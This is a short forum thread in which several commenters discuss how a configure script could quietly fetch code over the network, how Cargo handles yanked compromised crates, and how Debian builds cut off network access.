[fragmede]

seems trivial for a configure script to call curl/wget somewhere in the depths of it, no?

[timschmidt]

Exactly. And at least Cargo will refuse to download a crate which has been yanked. So any crate which has been discovered to be compromised can be yanked, preventing further damage even when someone has already downloaded something which depends on it.

Building packages with up-to-date dependencies is also vastly preferable to building against ancient copies of libraries vendored into a codebase at some point in the past, a situation I see far too often in C/C++ codebases.

[Hackbraten]

Debian’s rules files often deliberately sinkhole the entire network during the build. It’s not the worst idea.

[fragmede]

I wonder if you could do it inside the config script without the network.